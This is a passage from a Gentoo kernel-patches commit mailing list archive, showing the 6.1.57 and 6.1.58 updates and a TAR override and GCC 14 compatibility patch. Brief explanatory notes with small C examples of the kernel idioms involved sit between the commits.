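The bulk of the ASoC changes in the patch above (sta350, tas5086, fsl_sai, fsl_ssi, imx-card, rcar ssi) apply one mechanical conversion: a presence test through of_get_property(np, prop, NULL) becomes of_property_read_bool(np, prop), which reports whether the property exists as a bool. A minimal standalone sketch of the idiom follows; the driver, structure, and property name are hypothetical and not taken from the patch:

#include <linux/of.h>

struct demo_pdata {
	bool fast_charge;	/* hypothetical flag filled from the DT */
};

static void demo_parse_dt(const struct device_node *np,
			  struct demo_pdata *pdata)
{
	/*
	 * Old idiom, as removed by the hunks above:
	 *
	 *	if (of_get_property(np, "vendor,fast-charge", NULL))
	 *		pdata->fast_charge = 1;
	 *
	 * New idiom: of_property_read_bool() returns true when the
	 * property is present, so it assigns directly to a bool field.
	 */
	pdata->fast_charge = of_property_read_bool(np, "vendor,fast-charge");
}

For typical flag properties the two forms behave the same; the helper simply states the intent instead of open-coding the presence check.
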
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-18 20:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-18 20:04 UTC (permalink / raw
  To: gentoo-commits

commit:     2946d45ccac2c25c38654d1f380feab6f5672191
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Oct 18 20:04:34 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Oct 18 20:04:34 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2946d45c

TAR override and gcc 14 patch

kheaders: make it possible to override TAR
gcc-plugins: Rename last_stmt() for GCC 14+

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  8 ++++
 2930_tar_override.patch                   | 69 +++++++++++++++++++++++++++++++
 2940_handle-gcc-14-last-stmt-rename.patch | 31 ++++++++++++++
 3 files changed, 108 insertions(+)

diff --git a/0000_README b/0000_README
index 09720a58..1d0e038f 100644
--- a/0000_README
+++ b/0000_README
@@ -303,6 +303,14 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:  2930_tar_override.patch
+From:   https://lore.kernel.org/lkml/20230412082743.350699-1-mgorny@gentoo.org/#t
+Desc:   kheaders: make it possible to override TAR
+
+Patch:  2940_handle-gcc-14-last-stmt-rename.patch
+From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
+Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tar_override.patch b/2930_tar_override.patch
new file mode 100644
index 00000000..aa62aae1
--- /dev/null
+++ b/2930_tar_override.patch
@@ -0,0 +1,69 @@
+From: "Michał Górny" <mgorny@gentoo.org>
+To: Dmitry Goldin <dgoldin+lkml@protonmail.ch>
+Cc: "Masahiro Yamada" <yamada.masahiro@socionext.com>,
+	linux-kernel@vger.kernel.org, "Michał Górny" <mgorny@gentoo.org>,
+	"Sam James" <sam@gentoo.org>,
+	"Masahiro Yamada" <masahiroy@kernel.org>
+Subject: [PATCH v2] kheaders: make it possible to override TAR
+Date: Wed, 12 Apr 2023 10:27:43 +0200	[thread overview]
+Message-ID: <20230412082743.350699-1-mgorny@gentoo.org> (raw)
+In-Reply-To: <CAK7LNATfrxu7BK0ZRq+qSjObiz6GpS3U5L=12vDys5_yy=Mdow@mail.gmail.com>
+
+Commit 86cdd2fdc4e39c388d39c7ba2396d1a9dfd66226 ("kheaders: make headers
+archive reproducible") introduced a number of options specific to GNU
+tar to the `tar` invocation in `gen_kheaders.sh` script.  This causes
+the script to fail to work on systems where `tar` is not GNU tar.  This
+can occur e.g. on recent Gentoo Linux installations that support using
+bsdtar from libarchive instead.
+
+Add a `TAR` make variable to make it possible to override the tar
+executable used, e.g. by specifying:
+
+  make TAR=gtar
+
+Link: https://bugs.gentoo.org/884061
+Reported-by: Sam James <sam@gentoo.org>
+Tested-by: Sam James <sam@gentoo.org>
+Co-developed-by: Masahiro Yamada <masahiroy@kernel.org>
+Signed-off-by: Michał Górny <mgorny@gentoo.org>
+---
+ Makefile               | 3 ++-
+ kernel/gen_kheaders.sh | 2 +-
+ 2 files changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 5aeea3d98..50045059c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -520,6 +520,7 @@ LZMA		= lzma
+ LZ4		= lz4c
+ XZ		= xz
+ ZSTD		= zstd
++TAR		= tar
+ 
+ PAHOLE_FLAGS	= $(shell PAHOLE=$(PAHOLE) $(srctree)/scripts/pahole-flags.sh)
+ 
+@@ -599,7 +600,7 @@ export RUSTC RUSTDOC RUSTFMT RUSTC_OR_CLIPPY_QUIET RUSTC_OR_CLIPPY BINDGEN CARGO
+ export HOSTRUSTC KBUILD_HOSTRUSTFLAGS
+ export CPP AR NM STRIP OBJCOPY OBJDUMP READELF PAHOLE RESOLVE_BTFIDS LEX YACC AWK INSTALLKERNEL
+ export PERL PYTHON3 CHECK CHECKFLAGS MAKE UTS_MACHINE HOSTCXX
+-export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD
++export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD TAR
+ export KBUILD_HOSTCXXFLAGS KBUILD_HOSTLDFLAGS KBUILD_HOSTLDLIBS LDFLAGS_MODULE
+ export KBUILD_USERCFLAGS KBUILD_USERLDFLAGS
+ 
+diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
+index 1ef9a8751..82d539648 100755
+--- a/kernel/gen_kheaders.sh
++++ b/kernel/gen_kheaders.sh
+@@ -86,7 +86,7 @@ find $cpio_dir -type f -print0 |
+ # For compatibility with older versions of tar, files are fed to tar
+ # pre-sorted, as --sort=name might not be available.
+ find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
+-    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
++    ${TAR:-tar} "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
+     --owner=0 --group=0 --numeric-owner --no-recursion \
+     -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
+ 
+-- 
+2.40.0
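
The patch above is a small exercise in the override-with-default pattern: the build exports a TAR variable and the script falls back to plain tar when it is unset, via ${TAR:-tar}. A hedged sketch of the same pattern in C follows; it is illustrative only and not part of the kernel build:

#include <stdio.h>
#include <stdlib.h>

/* Read an override from the environment, falling back to a default,
 * mirroring what ${TAR:-tar} does in the shell script above (an empty
 * value is treated the same as an unset one).
 */
int main(void)
{
	const char *tar = getenv("TAR");

	if (!tar || !*tar)
		tar = "tar";	/* system default */

	printf("using archiver: %s\n", tar);
	return 0;
}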

diff --git a/2940_handle-gcc-14-last-stmt-rename.patch b/2940_handle-gcc-14-last-stmt-rename.patch
new file mode 100644
index 00000000..b04ce8da
--- /dev/null
+++ b/2940_handle-gcc-14-last-stmt-rename.patch
@@ -0,0 +1,31 @@
+From: Kees Cook <keescook@chromium.org>
+To: linux-hardening@vger.kernel.org
+Cc: Kees Cook <keescook@chromium.org>, linux-kernel@vger.kernel.org
+Subject: [PATCH] gcc-plugins: Rename last_stmt() for GCC 14+
+Date: Thu, 10 Aug 2023 23:05:49 -0700	[thread overview]
+Message-ID: <20230811060545.never.564-kees@kernel.org> (raw)
+
+In GCC 14, last_stmt() was renamed to last_nondebug_stmt(). Add a helper
+macro to handle the renaming.
+
+Cc: linux-hardening@vger.kernel.org
+Signed-off-by: Kees Cook <keescook@chromium.org>
+---
+ scripts/gcc-plugins/gcc-common.h | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 84c730da36dd..1ae39b9f4a95 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
+ #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
+ #endif
+ 
++#if BUILDING_GCC_VERSION >= 14000
++#define last_stmt(x)			last_nondebug_stmt(x)
++#endif
++
+ #endif
+-- 
+2.34.1


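The gcc-common.h change above is an instance of a general source-compatibility pattern: when a toolchain renames a function, gate a macro alias on the toolchain version so the rest of the code keeps a single spelling. A sketch of the idiom with hypothetical names; old_api() and new_api() stand in for any renamed pair, while BUILDING_GCC_VERSION is the real gcc-plugins version macro:

/*
 * Sketch only: old_api()/new_api() are placeholders for a function
 * renamed in GCC 14. On older compilers the macro is not defined, so
 * old_api() resolves to the real function; on GCC 14+ the preprocessor
 * rewrites every call site to new_api().
 */
#if BUILDING_GCC_VERSION >= 14000
#define old_api(x)	new_api(x)
#endif

This works cleanly only because the newer toolchain drops the old declaration, so the macro cannot collide with a live function of the same name; the same reasoning applies to the last_stmt()/last_nondebug_stmt() pair handled by the patch.
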
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-15 17:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-15 17:40 UTC (permalink / raw
  To: gentoo-commits

commit:     2938b52a4b8118a1fed79013d3bb258819489ad8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Oct 15 17:40:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Oct 15 17:40:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2938b52a

Linux patch 6.1.58

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1057_linux-6.1.58.patch | 389 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 393 insertions(+)

diff --git a/0000_README b/0000_README
index 921005a5..09720a58 100644
--- a/0000_README
+++ b/0000_README
@@ -271,6 +271,10 @@ Patch:  1056_linux-6.1.57.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.57
 
+Patch:  1057_linux-6.1.58.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.58
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1057_linux-6.1.58.patch b/1057_linux-6.1.58.patch
new file mode 100644
index 00000000..b890875f
--- /dev/null
+++ b/1057_linux-6.1.58.patch
@@ -0,0 +1,389 @@
+diff --git a/Makefile b/Makefile
+index b435b56594f0f..ce1eec0b5010d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 57
++SUBLEVEL = 58
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 5a976fa343df1..3bb530d4bb5ce 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -93,10 +93,12 @@ nfs_direct_handle_truncated(struct nfs_direct_req *dreq,
+ 		dreq->max_count = dreq_len;
+ 		if (dreq->count > dreq_len)
+ 			dreq->count = dreq_len;
+-	}
+ 
+-	if (test_bit(NFS_IOHDR_ERROR, &hdr->flags) && !dreq->error)
+-		dreq->error = hdr->error;
++		if (test_bit(NFS_IOHDR_ERROR, &hdr->flags))
++			dreq->error = hdr->error;
++		else /* Clear outstanding error if this is EOF */
++			dreq->error = 0;
++	}
+ }
+ 
+ static void
+@@ -118,18 +120,6 @@ nfs_direct_count_bytes(struct nfs_direct_req *dreq,
+ 		dreq->count = dreq_len;
+ }
+ 
+-static void nfs_direct_truncate_request(struct nfs_direct_req *dreq,
+-					struct nfs_page *req)
+-{
+-	loff_t offs = req_offset(req);
+-	size_t req_start = (size_t)(offs - dreq->io_start);
+-
+-	if (req_start < dreq->max_count)
+-		dreq->max_count = req_start;
+-	if (req_start < dreq->count)
+-		dreq->count = req_start;
+-}
+-
+ /**
+  * nfs_swap_rw - NFS address space operation for swap I/O
+  * @iocb: target I/O control block
+@@ -500,9 +490,7 @@ static void nfs_direct_add_page_head(struct list_head *list,
+ 	kref_get(&head->wb_kref);
+ }
+ 
+-static void nfs_direct_join_group(struct list_head *list,
+-				  struct nfs_commit_info *cinfo,
+-				  struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+@@ -524,7 +512,7 @@ static void nfs_direct_join_group(struct list_head *list,
+ 				nfs_release_request(subreq);
+ 			}
+ 		} while ((subreq = subreq->wb_this_page) != req);
+-		nfs_join_page_group(req, cinfo, inode);
++		nfs_join_page_group(req, inode);
+ 	}
+ }
+ 
+@@ -542,15 +530,20 @@ nfs_direct_write_scan_commit_list(struct inode *inode,
+ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ {
+ 	struct nfs_pageio_descriptor desc;
+-	struct nfs_page *req;
++	struct nfs_page *req, *tmp;
+ 	LIST_HEAD(reqs);
+ 	struct nfs_commit_info cinfo;
++	LIST_HEAD(failed);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	nfs_direct_write_scan_commit_list(dreq->inode, &reqs, &cinfo);
+ 
+-	nfs_direct_join_group(&reqs, &cinfo, dreq->inode);
++	nfs_direct_join_group(&reqs, dreq->inode);
+ 
++	dreq->count = 0;
++	dreq->max_count = 0;
++	list_for_each_entry(req, &reqs, wb_list)
++		dreq->max_count += req->wb_bytes;
+ 	nfs_clear_pnfs_ds_commit_verifiers(&dreq->ds_cinfo);
+ 	get_dreq(dreq);
+ 
+@@ -558,40 +551,27 @@ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ 			      &nfs_direct_write_completion_ops);
+ 	desc.pg_dreq = dreq;
+ 
+-	while (!list_empty(&reqs)) {
+-		req = nfs_list_entry(reqs.next);
++	list_for_each_entry_safe(req, tmp, &reqs, wb_list) {
+ 		/* Bump the transmission count */
+ 		req->wb_nio++;
+ 		if (!nfs_pageio_add_request(&desc, req)) {
+-			spin_lock(&dreq->lock);
+-			if (dreq->error < 0) {
+-				desc.pg_error = dreq->error;
+-			} else if (desc.pg_error != -EAGAIN) {
+-				dreq->flags = 0;
+-				if (!desc.pg_error)
+-					desc.pg_error = -EIO;
++			nfs_list_move_request(req, &failed);
++			spin_lock(&cinfo.inode->i_lock);
++			dreq->flags = 0;
++			if (desc.pg_error < 0)
+ 				dreq->error = desc.pg_error;
+-			} else
+-				dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-			spin_unlock(&dreq->lock);
+-			break;
++			else
++				dreq->error = -EIO;
++			spin_unlock(&cinfo.inode->i_lock);
+ 		}
+ 		nfs_release_request(req);
+ 	}
+ 	nfs_pageio_complete(&desc);
+ 
+-	while (!list_empty(&reqs)) {
+-		req = nfs_list_entry(reqs.next);
++	while (!list_empty(&failed)) {
++		req = nfs_list_entry(failed.next);
+ 		nfs_list_remove_request(req);
+ 		nfs_unlock_and_release_request(req);
+-		if (desc.pg_error == -EAGAIN) {
+-			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else {
+-			spin_lock(&dreq->lock);
+-			nfs_direct_truncate_request(dreq, req);
+-			spin_unlock(&dreq->lock);
+-			nfs_release_request(req);
+-		}
+ 	}
+ 
+ 	if (put_dreq(dreq))
+@@ -611,6 +591,8 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	if (status < 0) {
+ 		/* Errors in commit are fatal */
+ 		dreq->error = status;
++		dreq->max_count = 0;
++		dreq->count = 0;
+ 		dreq->flags = NFS_ODIRECT_DONE;
+ 	} else {
+ 		status = dreq->error;
+@@ -621,12 +603,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	while (!list_empty(&data->pages)) {
+ 		req = nfs_list_entry(data->pages.next);
+ 		nfs_list_remove_request(req);
+-		if (status < 0) {
+-			spin_lock(&dreq->lock);
+-			nfs_direct_truncate_request(dreq, req);
+-			spin_unlock(&dreq->lock);
+-			nfs_release_request(req);
+-		} else if (!nfs_write_match_verf(verf, req)) {
++		if (status >= 0 && !nfs_write_match_verf(verf, req)) {
+ 			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+ 			/*
+ 			 * Despite the reboot, the write was successful,
+@@ -634,7 +611,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 			 */
+ 			req->wb_nio = 0;
+ 			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else
++		} else /* Error or match */
+ 			nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -687,7 +664,6 @@ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+ 	while (!list_empty(&reqs)) {
+ 		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
+-		nfs_direct_truncate_request(dreq, req);
+ 		nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -737,8 +713,7 @@ static void nfs_direct_write_completion(struct nfs_pgio_header *hdr)
+ 	}
+ 
+ 	nfs_direct_count_bytes(dreq, hdr);
+-	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags) &&
+-	    !test_bit(NFS_IOHDR_ERROR, &hdr->flags)) {
++	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags)) {
+ 		if (!dreq->flags)
+ 			dreq->flags = NFS_ODIRECT_DO_COMMIT;
+ 		flags = dreq->flags;
+@@ -782,23 +757,18 @@ static void nfs_write_sync_pgio_error(struct list_head *head, int error)
+ static void nfs_direct_write_reschedule_io(struct nfs_pgio_header *hdr)
+ {
+ 	struct nfs_direct_req *dreq = hdr->dreq;
+-	struct nfs_page *req;
+-	struct nfs_commit_info cinfo;
+ 
+ 	trace_nfs_direct_write_reschedule_io(dreq);
+ 
+-	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	spin_lock(&dreq->lock);
+-	if (dreq->error == 0)
++	if (dreq->error == 0) {
+ 		dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-	set_bit(NFS_IOHDR_REDO, &hdr->flags);
+-	spin_unlock(&dreq->lock);
+-	while (!list_empty(&hdr->pages)) {
+-		req = nfs_list_entry(hdr->pages.next);
+-		nfs_list_remove_request(req);
+-		nfs_unlock_request(req);
+-		nfs_mark_request_commit(req, NULL, &cinfo, 0);
++		/* fake unstable write to let common nfs resend pages */
++		hdr->verf.committed = NFS_UNSTABLE;
++		hdr->good_bytes = hdr->args.offset + hdr->args.count -
++			hdr->io_start;
+ 	}
++	spin_unlock(&dreq->lock);
+ }
+ 
+ static const struct nfs_pgio_completion_ops nfs_direct_write_completion_ops = {
+@@ -826,11 +796,9 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ {
+ 	struct nfs_pageio_descriptor desc;
+ 	struct inode *inode = dreq->inode;
+-	struct nfs_commit_info cinfo;
+ 	ssize_t result = 0;
+ 	size_t requested_bytes = 0;
+ 	size_t wsize = max_t(size_t, NFS_SERVER(inode)->wsize, PAGE_SIZE);
+-	bool defer = false;
+ 
+ 	trace_nfs_direct_write_schedule_iovec(dreq);
+ 
+@@ -871,39 +839,19 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ 				break;
+ 			}
+ 
+-			pgbase = 0;
+-			bytes -= req_len;
+-			requested_bytes += req_len;
+-			pos += req_len;
+-			dreq->bytes_left -= req_len;
+-
+-			if (defer) {
+-				nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-				continue;
+-			}
+-
+ 			nfs_lock_request(req);
+ 			req->wb_index = pos >> PAGE_SHIFT;
+ 			req->wb_offset = pos & ~PAGE_MASK;
+-			if (nfs_pageio_add_request(&desc, req))
+-				continue;
+-
+-			/* Exit on hard errors */
+-			if (desc.pg_error < 0 && desc.pg_error != -EAGAIN) {
++			if (!nfs_pageio_add_request(&desc, req)) {
+ 				result = desc.pg_error;
+ 				nfs_unlock_and_release_request(req);
+ 				break;
+ 			}
+-
+-			/* If the error is soft, defer remaining requests */
+-			nfs_init_cinfo_from_dreq(&cinfo, dreq);
+-			spin_lock(&dreq->lock);
+-			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-			spin_unlock(&dreq->lock);
+-			nfs_unlock_request(req);
+-			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-			desc.pg_error = 0;
+-			defer = true;
++			pgbase = 0;
++			bytes -= req_len;
++			requested_bytes += req_len;
++			pos += req_len;
++			dreq->bytes_left -= req_len;
+ 		}
+ 		nfs_direct_release_pages(pagevec, npages);
+ 		kvfree(pagevec);
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index 0a8aed0ac9945..f41d24b54fd1f 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -58,8 +58,7 @@ static const struct nfs_pgio_completion_ops nfs_async_write_completion_ops;
+ static const struct nfs_commit_completion_ops nfs_commit_completion_ops;
+ static const struct nfs_rw_ops nfs_rw_write_ops;
+ static void nfs_inode_remove_request(struct nfs_page *req);
+-static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
+-				     struct nfs_page *req);
++static void nfs_clear_request_commit(struct nfs_page *req);
+ static void nfs_init_cinfo_from_inode(struct nfs_commit_info *cinfo,
+ 				      struct inode *inode);
+ static struct nfs_page *
+@@ -503,8 +502,8 @@ nfs_destroy_unlinked_subrequests(struct nfs_page *destroy_list,
+  * the (former) group.  All subrequests are removed from any write or commit
+  * lists, unlinked from the group and destroyed.
+  */
+-void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
+-			 struct inode *inode)
++void
++nfs_join_page_group(struct nfs_page *head, struct inode *inode)
+ {
+ 	struct nfs_page *subreq;
+ 	struct nfs_page *destroy_list = NULL;
+@@ -534,7 +533,7 @@ void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
+ 	 * Commit list removal accounting is done after locks are dropped */
+ 	subreq = head;
+ 	do {
+-		nfs_clear_request_commit(cinfo, subreq);
++		nfs_clear_request_commit(subreq);
+ 		subreq = subreq->wb_this_page;
+ 	} while (subreq != head);
+ 
+@@ -568,10 +567,8 @@ nfs_lock_and_join_requests(struct page *page)
+ {
+ 	struct inode *inode = page_file_mapping(page)->host;
+ 	struct nfs_page *head;
+-	struct nfs_commit_info cinfo;
+ 	int ret;
+ 
+-	nfs_init_cinfo_from_inode(&cinfo, inode);
+ 	/*
+ 	 * A reference is taken only on the head request which acts as a
+ 	 * reference to the whole page group - the group will not be destroyed
+@@ -588,7 +585,7 @@ nfs_lock_and_join_requests(struct page *page)
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	nfs_join_page_group(head, &cinfo, inode);
++	nfs_join_page_group(head, inode);
+ 
+ 	return head;
+ }
+@@ -959,16 +956,18 @@ nfs_clear_page_commit(struct page *page)
+ }
+ 
+ /* Called holding the request lock on @req */
+-static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
+-				     struct nfs_page *req)
++static void
++nfs_clear_request_commit(struct nfs_page *req)
+ {
+ 	if (test_bit(PG_CLEAN, &req->wb_flags)) {
+ 		struct nfs_open_context *ctx = nfs_req_openctx(req);
+ 		struct inode *inode = d_inode(ctx->dentry);
++		struct nfs_commit_info cinfo;
+ 
++		nfs_init_cinfo_from_inode(&cinfo, inode);
+ 		mutex_lock(&NFS_I(inode)->commit_mutex);
+-		if (!pnfs_clear_request_commit(req, cinfo)) {
+-			nfs_request_remove_commit_list(req, cinfo);
++		if (!pnfs_clear_request_commit(req, &cinfo)) {
++			nfs_request_remove_commit_list(req, &cinfo);
+ 		}
+ 		mutex_unlock(&NFS_I(inode)->commit_mutex);
+ 		nfs_clear_page_commit(req->wb_page);
+diff --git a/include/linux/nfs_page.h b/include/linux/nfs_page.h
+index e39a8cf8b1797..ba7e2e4b09264 100644
+--- a/include/linux/nfs_page.h
++++ b/include/linux/nfs_page.h
+@@ -145,9 +145,7 @@ extern	void nfs_unlock_request(struct nfs_page *req);
+ extern	void nfs_unlock_and_release_request(struct nfs_page *);
+ extern	struct nfs_page *nfs_page_group_lock_head(struct nfs_page *req);
+ extern	int nfs_page_group_lock_subrequests(struct nfs_page *head);
+-extern void nfs_join_page_group(struct nfs_page *head,
+-				struct nfs_commit_info *cinfo,
+-				struct inode *inode);
++extern	void nfs_join_page_group(struct nfs_page *head, struct inode *inode);
+ extern int nfs_page_group_lock(struct nfs_page *);
+ extern void nfs_page_group_unlock(struct nfs_page *);
+ extern bool nfs_page_group_sync_on_bit(struct nfs_page *, unsigned int);
+diff --git a/lib/test_meminit.c b/lib/test_meminit.c
+index 0ae35223d7733..85d8dd8e01dc4 100644
+--- a/lib/test_meminit.c
++++ b/lib/test_meminit.c
+@@ -93,7 +93,7 @@ static int __init test_pages(int *total_failures)
+ 	int failures = 0, num_tests = 0;
+ 	int i;
+ 
+-	for (i = 0; i <= MAX_ORDER; i++)
++	for (i = 0; i < MAX_ORDER; i++)
+ 		num_tests += do_alloc_pages_order(i, &failures);
+ 
+ 	REPORT_FAILURES_IN_FN();


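The lib/test_meminit.c hunk at the end of the patch above tightens a loop bound, and the reasoning deserves a note: on 6.1-era kernels MAX_ORDER is an exclusive limit, meaning the buddy allocator serves orders 0 through MAX_ORDER - 1 and rejects order == MAX_ORDER. A minimal sketch of the convention; demo_touch_all_orders() is hypothetical and not part of the test:

#include <linux/errno.h>
#include <linux/gfp.h>

/* Walk every valid allocation order; note the strict '<' bound. */
static int demo_touch_all_orders(void)
{
	int order;

	for (order = 0; order < MAX_ORDER; order++) {
		struct page *page = alloc_pages(GFP_KERNEL, order);

		if (!page)
			return -ENOMEM;

		__free_pages(page, order);
	}

	return 0;
}

Later mainline kernels redefined MAX_ORDER as an inclusive bound, which appears to be how the off-by-one form reached this branch; on 6.1 the strict comparison is the correct spelling.
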
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-10 22:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-10 22:56 UTC (permalink / raw
  To: gentoo-commits

commit:     6b435f35a8c2bee0cd4a811e29f39eade1785d1a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Oct 10 22:56:26 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Oct 10 22:56:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6b435f35

Linux patch 6.1.57

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1056_linux-6.1.57.patch | 11235 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11239 insertions(+)

diff --git a/0000_README b/0000_README
index b5768a62..921005a5 100644
--- a/0000_README
+++ b/0000_README
@@ -267,6 +267,10 @@ Patch:  1055_linux-6.1.56.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.56
 
+Patch:  1056_linux-6.1.57.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.57
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1056_linux-6.1.57.patch b/1056_linux-6.1.57.patch
new file mode 100644
index 00000000..455f1d71
--- /dev/null
+++ b/1056_linux-6.1.57.patch
@@ -0,0 +1,11235 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 9000640f7f7a0..d9fce65b2f047 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -63,6 +63,8 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #1902691        | ARM64_ERRATUM_1902691       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A520     | #2966298        | ARM64_ERRATUM_2966298       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A53      | #826319         | ARM64_ERRATUM_826319        |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A53      | #827319         | ARM64_ERRATUM_827319        |
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 3301288a7c692..f5f7a464605f9 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -2148,6 +2148,14 @@ accept_ra_min_hop_limit - INTEGER
+ 
+ 	Default: 1
+ 
++accept_ra_min_lft - INTEGER
++	Minimum acceptable lifetime value in Router Advertisement.
++
++	RA sections with a lifetime less than this value shall be
++	ignored. Zero lifetimes stay unaffected.
++
++	Default: 0
++
+ accept_ra_pinfo - BOOLEAN
+ 	Learn Prefix Information in Router Advertisement.
+ 
+diff --git a/Makefile b/Makefile
+index 9ceda3dad5eb7..b435b56594f0f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 56
++SUBLEVEL = 57
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
